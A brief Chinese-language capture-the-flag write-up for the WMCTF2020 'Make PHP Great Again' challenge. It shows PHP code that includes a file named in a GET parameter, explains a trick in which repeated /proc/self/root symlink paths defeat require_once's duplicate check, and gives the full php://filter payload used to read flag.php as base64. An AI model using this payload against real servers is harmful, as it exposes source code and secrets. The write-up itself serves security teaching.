[WMCTF2020]Make PHP Great Again
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
require_once $_GET['file'];
}
这里涉及到一个知识点是(php源码分析 require_once 绕过不能重复包含文件的限制 - 安全客,安全资讯平台):PHP最新版的小Trick, require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含。构造payload:/?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
得到base64加密字符串,解密得flag